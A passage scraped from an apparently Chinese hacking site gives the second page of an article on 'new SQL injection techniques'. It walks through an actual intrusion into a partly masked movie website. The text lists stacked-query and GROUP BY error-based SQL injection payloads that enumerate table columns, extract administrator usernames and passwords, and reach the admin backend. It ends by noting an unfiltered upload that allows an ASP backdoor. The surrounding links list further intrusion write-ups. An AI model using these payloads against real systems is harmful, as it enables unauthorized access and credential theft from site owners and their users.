·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]SQL注入的新技巧

热荐 ★★★★★

SQL注入的新技巧

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-6-22 9:05:26

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff;update [users] set email=(select top 1 col_name(object_id(users),3) from users) where name=ffff;--
得到第三个字段是password
ffff;update [users] set email=(select top 1 col_name(object_id(users),4) from users) where name=ffff;--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.userid 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/user/wantpws.asp，行63
这个第二个字段就是userid
显示第三个字段。
a group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.password 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/user/wantpws.asp，行63
得到是password
同理，一直显示出所有。：）
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note

starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff;update [users] set email=(select top 1 name from password) where name=ffff;--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。
http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人密码也都能看到了。
ffff;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
ffff;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--

ffff;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--

只是能免费看电影好象还不够哈..我看了看它的后台管理原来在添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就能上传一个asp后门并执行。

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：sygbox

上一篇文章：跨站脚本执行漏洞详解

下一篇文章：在webshell基础上伪造SQL注入点

【字体：小大】

中介交易区

实例讲解跨站入侵攻防战之攻击篇	05-08
对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26